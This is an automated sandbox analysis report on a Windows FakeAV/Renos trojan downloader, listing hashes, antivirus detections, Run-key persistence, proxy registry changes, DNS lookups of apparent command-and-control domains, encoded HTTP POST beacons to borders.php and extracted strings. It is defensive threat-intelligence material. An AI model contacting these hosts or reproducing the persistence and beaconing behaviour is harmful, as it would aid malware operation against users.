Analysis Date: 2015-01-17 17:34:40
MD5: ee1d807d757ef0c31aecd9383688900b
SHA1: 8f267aac400931ee441177e97d1760ba2e783aa6

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: a288a97b10b6ca4056a79dcf34f1944d sha1: b6bee984d774cdd9e2df209f5352863f32f8a6d2 size: 7680
Section .data md5: b2f28b3769e36ebab61632b35ce72c1f sha1: f3a1d154ea786e8246116d64720e873976524c24 size: 13312
Section .bss md5: 14f24e468ad3e681067a7853adbb18a6 sha1: a62f3593dd9e62584a54ea5a05dfe56c145c324d size: 109568
Section .idata md5: 62bc5bae3566db8b4ecfa50422bc2598 sha1: 34a66c350bf6d01ad375107afcd08cb9c104e7d1 size: 3072
Section .rsrc md5: abc084c4f497a76b9eb2cf808b01f0e1 sha1: 2ca98422e89fc3ef12a7f080caa000e00c2c0d30 size: 4096
Timestamp: 2010-01-01 06:41:57
Version:
LegalCopyright: Copyright © 2010 PC Tools. Q3 All rights reserved. n
InternalName: magPZh.exe
FileVersion: 7.0.0.61
CompanyName: videosoft
LegalTrademarks:
Comments:
ProductName: t I3
ProductVersion: 7.0.0.61
FileDescription: cVideo ComponentcY
OriginalFilename: magPZh.exe
Packer: Borland Delphi 4.0
PEhash: 01ea4012fffd4b2c403d20a96ad9a22cc3bbc3e1
IMPhash: 177045aec32ebcb26cafbcb48f03c62d
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Variant.Kazy.20846
AV Alwil (avast): MalOb-IJ [Cryp]
AV Arcabit (arcavir): Gen:Variant.Kazy.20846
AV Authentium: W32/FakeAlert.KN.gen!Eldorado
AV Avira (antivir): TR/Jorik.G.2
AV BullGuard: Gen:Variant.Kazy.20846
AV CA (E-Trust Ino): Win32/Renos.D!generic
AV CAT (quickheal): Trojan.Renos.LN
AV ClamAV: Trojan.Jorik-154
AV Dr. Web: Trojan.DownLoader5.6150
AV Emsisoft: Gen:Variant.Kazy.20846
AV Eset (nod32): Win32/TrojanDownloader.FakeAlert.BGV
AV Fortinet: W32/Diple.IZ!tr
AV Frisk (f-prot): W32/FakeAlert.KN.gen!Eldorado
AV F-Secure: Gen:Variant.Kazy.20846
AV Grisoft (avg): Generic22.VVJ
AV Ikarus: Trojan.Win32.Jorik
AV K7: Riskware ( 0040eff71 )
AV Kaspersky: Hoax.Win32.FlashApp.gen
AV MalwareBytes: Trojan.Downloader
AV Mcafee: Downloader-CEW.ap
AV Microsoft Security Essentials: TrojanDownloader:Win32/Renos.PT
AV MicroWorld (escan): Gen:Variant.Kazy.20846
AV Rising: Trojan.Win32.Generic.12866C70
AV Sophos: Mal/FakeAV-IZ
AV Symantec: Trojan.FakeAV
AV Trend Micro: TROJ_AGENT.SMAH
AV VirusBlokAda (vba32): SScope.Trojan.ExpProc.019

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates Process: C:\malware.exe
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\GHWAUC6NNZ ➝
C:\malware.exe
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\GHWAUC6NNZ\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File: C:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNS: 30.157.231.171
Winsock DNS: francisawe.com
Winsock DNS: spanishser.com

Network Details:

DNS: webcache.foreign.ccgslb.com
Type: A
58.68.168.250
DNS: webcache.foreign.ccgslb.com
Type: A
65.255.44.2
DNS: webcache.foreign.ccgslb.com
Type: A
209.177.90.10
DNS: webcache.foreign.ccgslb.com
Type: A
209.177.92.6
DNS: 58.com
Type: A
211.151.111.30
DNS: hatena.ne.jp
Type: A
59.106.194.19
DNS: francisawe.com
Type: A
192.64.178.149
DNS: dergeneral.com
Type: A
54.209.61.132
DNS: people.com.cn
Type: A
DNS: spanishser.com
Type: A
DNS: vawsofort.com
Type: A
HTTP POST: http://francisawe.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP POST: http://30.157.231.171/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP: 192.168.1.1:1031 ➝ 192.64.178.149:80
Flows TCP: 192.168.1.1:1032 ➝ 30.157.231.171:80

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   6672616e 63697361 77652e63 6f6d0d0a   francisawe.com..
0x000000b0 (00176)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000c0 (00192)   3334310d 0a436f6e 6e656374 696f6e3a   341..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a436163    Keep-Alive..Cac
0x000000e0 (00224)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000f0 (00240)   61636865 0d0a0d0a 64617461 3d2f436a   ache....data=/Cj
0x00000100 (00256)   45665a44 53767871 43694b30 6c74554d   EfZDSvxqCiK0ltUM
0x00000110 (00272)   31757932 2f797534 55355970 4e6d3176   1uy2/yu4U5YpNm1v
0x00000120 (00288)   2f2f6a54 6e675663 2b774d73 2b2b5a42   //jTngVc+wMs++ZB
0x00000130 (00304)   6a375a53 59547233 69426b47 2f672b37   j7ZSYTr3iBkG/g+7
0x00000140 (00320)   5643432f 31396b66 694f4870 37655263   VCC/19kfiOHp7eRc
0x00000150 (00336)   48506959 6f393930 4d55756a 67555734   HPiYo990MUujgUW4
0x00000160 (00352)   62765449 644e2f6a 50587547 506a6142   bvTIdN/jPXuGPjaB
0x00000170 (00368)   7a786c63 63356d70 4e303161 36742f51   zxlcc5mpN01a6t/Q
0x00000180 (00384)   69535858 77707a39 486d306b 7a396642   iSXXwpz9Hm0kz9fB
0x00000190 (00400)   6661556e 3130782f 474c636f 66526948   faUn10x/GLcofRiH
0x000001a0 (00416)   344c7646 73416947 59467361 696f4d57   4LvFsAiGYFsaioMW
0x000001b0 (00432)   30374b30 4533726b 6b334d65 5a557967   07K0E3rkk3MeZUyg
0x000001c0 (00448)   44654c47 77327331 322b6f50 4d4e726e   DeLGw2s12+oPMNrn
0x000001d0 (00464)   4a5a637a 687a5a38 78694e57 75355467   JZczhzZ8xiNWu5Tg
0x000001e0 (00480)   4f687134 4f715553 30424d54 644b3262   Ohq4OqUS0BMTdK2b
0x000001f0 (00496)   5a792f68 7833546e 6d477954 464c4868   Zy/hx3TnmGyTFLHh
0x00000200 (00512)   4c635266 2b76417a 494f424e 6d763433   LcRf+vAzIOBNmv43
0x00000210 (00528)   43444b32 51303541 56636d41 38324b68   CDK2Q05AVcmA82Kh
0x00000220 (00544)   54665573 732f476f 6c77786c 6d396b4c   TfUss/Golwxlm9kL
0x00000230 (00560)   6e726e6c 49365a67 366e3336 642f3334   nrnlI6Zg6n36d/34
0x00000240 (00576)   6b6f4656 78627151 6a2b673d 3d         koFVxbqQj+g==

0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   33302e31 35372e32 33312e31 37310d0a   30.157.231.171..
0x000000b0 (00176)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000c0 (00192)   3334310d 0a436f6e 6e656374 696f6e3a   341..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a436163    Keep-Alive..Cac
0x000000e0 (00224)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000f0 (00240)   61636865 0d0a0d0a 64617461 3d2f436a   ache....data=/Cj
0x00000100 (00256)   45665a44 53767871 43694b30 6c74554d   EfZDSvxqCiK0ltUM
0x00000110 (00272)   31757932 2f797534 55355970 4e6d3176   1uy2/yu4U5YpNm1v
0x00000120 (00288)   2f2f6a54 6e675663 2b774d73 2b2b5a42   //jTngVc+wMs++ZB
0x00000130 (00304)   6a375a53 59547233 69426b47 2f672b37   j7ZSYTr3iBkG/g+7
0x00000140 (00320)   5643432f 31396b66 694f4870 37655263   VCC/19kfiOHp7eRc
0x00000150 (00336)   48506959 6f393930 4d55756a 67555734   HPiYo990MUujgUW4
0x00000160 (00352)   62765449 644e2f6a 50587547 506a6142   bvTIdN/jPXuGPjaB
0x00000170 (00368)   7a786c63 63356d70 4e303161 36742f51   zxlcc5mpN01a6t/Q
0x00000180 (00384)   69535858 77707a39 486d306b 7a396642   iSXXwpz9Hm0kz9fB
0x00000190 (00400)   6661556e 3130782f 474c636f 66526948   faUn10x/GLcofRiH
0x000001a0 (00416)   344c7646 73416947 59467361 696f4d57   4LvFsAiGYFsaioMW
0x000001b0 (00432)   30374b30 4533726b 6b334d65 5a557967   07K0E3rkk3MeZUyg
0x000001c0 (00448)   44654c47 77327331 322b6f50 4d4e726e   DeLGw2s12+oPMNrn
0x000001d0 (00464)   4a5a637a 687a5a38 78694e57 75355467   JZczhzZ8xiNWu5Tg
0x000001e0 (00480)   4f687134 4f715553 30424d54 644b3262   Ohq4OqUS0BMTdK2b
0x000001f0 (00496)   5a792f68 7833546e 6d477954 464c4868   Zy/hx3TnmGyTFLHh
0x00000200 (00512)   4c635266 2b76417a 494f424e 6d763433   LcRf+vAzIOBNmv43
0x00000210 (00528)   43444b32 51303541 56636d41 38324b68   CDK2Q05AVcmA82Kh
0x00000220 (00544)   54665573 732f476f 6c77786c 6d396b4c   TfUss/Golwxlm9kL
0x00000230 (00560)   6e726e6c 49365a67 366e3336 642f3334   nrnlI6Zg6n36d/34
0x00000240 (00576)   6b6f4656 78627151 6a2b673d 3d         koFVxbqQj+g==


Strings
#+Y
040904E4
 2010  PC Tools. Q3 All rights reserved. n
56ox
7.0.0.61
&About
BBABORT
BBALL
BBCANCEL
Comments
CompanyName
Copyright 
cVideo ComponentcY
E&xit
&File
FileDescription
FileVersion
InternalName
LegalCopyright
LegalTrademarks
magPZh.exe
MAINMENU(
mFJn
&Open
OriginalFilename
ProductName
ProductVersion
StringFileInfo
t I3
Translation
VarFileInfo
videosoft
VS_VERSION_INFO
zHfI
 /$)($,
;00tq/
'%02x% ?#
+05238
07q	+i
(?0	8eL
 0[=d*n=fWE
0?D	Xeh
0}$/+I
;0+m,(
?#\?0S@
^:*0u	
16354VZ
17/P^^
19PM-,
1eq=RO
^1L$Hr
1mV=>l
1N6oa/
1$s!$E
<(2/8	Xed
2m.tex
'32PNyx
:33:"$
"*"$33
3333:"$
333333
3333333
$3333333
33333333
33333333?333333
333333333333333333
3333333333333338
333333:"33333338
33333:"$3333338
3333339
333338
33333833
#33338
:*"*"$3338
333838
334C33333338
33B$3333333
34""C33333833
3B""$33333
3Dhdx@
\3)}p87
3sWY9WXfRUj7o
}3t\;mZ
|{;$!4
4"*""C3338
$$	4e<
_4`eMa
$4?H	\et
,-5a@'
5f<9u_
5IS%XI
5MS}.az
63Q*T'
7;52J@
76KHk	
76mc	:]\
_7aRP	]K
7nFIQP
7PqvOt0p\
7ZYDhW
89	-':
?(	8e@
8$&he)
$8i2(N
8yn'a79
97HYlp
9H9NhAmPAm
9~--t@
9Wf3sN1
9%z:}tl
A(0VSi
aAp2r 2
ActivateKeyboardLayout
aee/8]
aHmrbD
AhSb@r
  </application> 
  <application> 
aSBSMzfSVx
AsQ$aR
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Windows - Setup UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
*Atb_dYa
atO?>k
% B&	?
B0EIP0D
B_(1gf
B!9y	I
$BMJ6d)
b-V4}WE|
"C3338
;c5KS[
c5\+WS
"C8338
CallNextHookEx
CharUpperA
CheckMenuItem
CloseClipboard
CloseHandle
C=mc~*:
>c*NhI
comctl32.dll
</compatibility> 
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> 
CreateIcon
CreateMenu
CreatePopupMenu
CreateThread
CreateWindowExA
C	$ w6
`.data
dCo_Duo-inVcEy?o
DeleteMenu
DIj_b<
?,dp1$
?D	Peh
$>DpkE
DrawAnimatedRects
DrawIcon
DrawMenuBar
DrawTextA
d&y*9u&
?$	(e0
}E1'(H}
? 	,e4
e6kOYP
e`G@@	%nEIxc
e#@h>}z
eJ_\p0h
ek9uxHpY4ncRwp@16
EnableMenuItem
EnableScrollBar
EndDialog
EnterCriticalSection
EnumThreadWindows
eO:47R?
EqQGqI
EqualRect
EsjPkL&M
ExitProcess
><'f\	
f,$0[$=4)O
f16=@T
fgJ88=
FindClose
F|MiBfQ
+F#?_nY
fokz|F
g0SdV1
GetActiveWindow
GetCurrentProcess
GetCurrentThread
GetDCEx
GetDesktopWindow
GetForegroundWindow
GetKeyboardLayoutNameA
GetKeyboardState
GetKeyboardType
GetMenu
GetMenuItemID
GetModuleHandleA
GetModuleHandleW
GetScrollInfo
GetScrollRange
GetSubMenu
GetSysColorBrush
GetSystemMenu
GetSystemMetrics
GetTickC3oun_
GetTickCount
GetTopWindow
GetUserDefaultLCID
GetWindow
GetWindowDC
GetWindowLongA
GetWindowThreadProcessId
#\'GN7
g&%n!I
g?o_9X
%h9.yA
HeapAlloc
HeapDestroy
Hjq _T
HPjaxoo
(hRS(N
"HuRWy%>
I3d<bI9xo
I5(;~Du
\:IbU<
@.idata
]IJ:iT
ImageList_Destroy
ImageList_DragShowNolock
ImageList_Draw
ImageList_DrawEx
ImageList_Remove
ImageList_Write
InsertMenuA
"IP<8|d
IsCharUpperA
IsChild
IsDlgButtonChecked
IsWindow
IsWindowEnabled
IsWindowVisible
,ItJUT
Iw% e2
=iY7z_
iyxxi$
%:%_(}j@
"J333333
"J"C3333
jg[t@!Al
Jiv|/[C
JLb	S/
jmeUn5OY
$-j=pH(
jY6yyO3
k0	sAN?c
KBcw<X;
Kd4FL#
.#K+e|
kEO_9}
kernel32.dll
LcWnx	
lnY25FOy0
LoadLibraryA
LoadStringA
LocalAlloc
LocalReAlloc
=LQc3&
lS[kCdk
lstrcpynA
lstrlenA
l?t	|e
lt<$@Q
lzbNcpl
_m4cpy9
M8_$tDA
magPZh.exe
main.cpl
MapWindowPoints
mCTkJey@24
|me*|$
mfbiEQwQ
MlVftn@20
M,MAdHG
;<:mmP`
\MOSW|
MoveFileA
	m\pwe
ms2-d.
MulDiv
mulDo:$G
MWS$CP60t
mzi7}U
;&MZuyRbL
n7}&@l"
NEds8hbZ4@20
"NFtYX
@NKH2&
O9_toz
Ob67{3dYrD
-odSxI
OemToCharA
\#oISl
`/OLEAUT
o.o"l'
OsG~-Y
o}x[gS
<P;e5K
Phh3$b
Ppv6j*
&P\vh-
P=WBRb
pyLf?/
P^Yu9^g(
Q (i3%
Qj`8S+_;
QjO)C)"
*q#lWV
]/-QR(
qssIvxmcgcXrN_
QuY4lEOjosJ9e@20
>QyH!doA
!]$R.*
	'R;8/
RedrawWindow
RegisterClipboardFormatA
RemoveMenu
Re-^[Q
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
rMPbTC
r;p}%;
\:',RrU
rs%\DW
@.rsrc
R<(^u,SjX
rU,tDC
rZD!faul;IZL
"$SA|l
=sc12o
      </security>
      <security>
SetCursor
SetFilePointer
SetFocus
SetForegroundWindow
SetScrollPos
SetScrollRange
SetTimer
SetWindowLongW
s!Focg
'S"HesT&!u
SHLWYl
!sionm
,+Sj$P
&|SK$:
sKN]&=
	Sm%l\
S/QW8]
      <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> 
      <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> 
&(SViiwW	h
	swmW{
t(/.\$
t%@:{	
T/9W?9
TFvIu0
    <!--The ID below indicates application support for Windows 7 --> 
    <!--The ID below indicates application support for Windows Vista --> 
This program must be run under Win32
TMs_2,m
;TNh!ad]
TrackPopupMenu
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
?		$}U
:u:as9_t
'}uBI5
ULGtWi
UN*IQSTRs
UnregisterClassA
user32.dll
uttgl3gOTod
 _u?uX
/uz$;a[c
V1U3|B+5
vc.Z<T>
Vh8%P!
VirtualAllocEx
vnM+`.rd
?Vt0CriE
wj_>Cx
WlCUxK
WOa&	${F6
wsprintfA
/WV@P 
W\wX\(a
Wx1Wo`
Wy_ybU
X?\	del
@?X	dep
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
xoEcKp
=xt	;;]
xU:Z)M
xYJ{=.
YD%j1e0
y/FPkWb
YGe}*|
YgZRI59nuAyJ_@16
=YKu<i
yKZhRHD
Y%OX!<
<y(QSPK
yw%_,Qo
Y	\y~{
~y$^[zH
Z59i&?
Z7givw_BTsNfdi@4
z$FSE+
 ,ZNNc
ZumyvvYVBYlw5O@4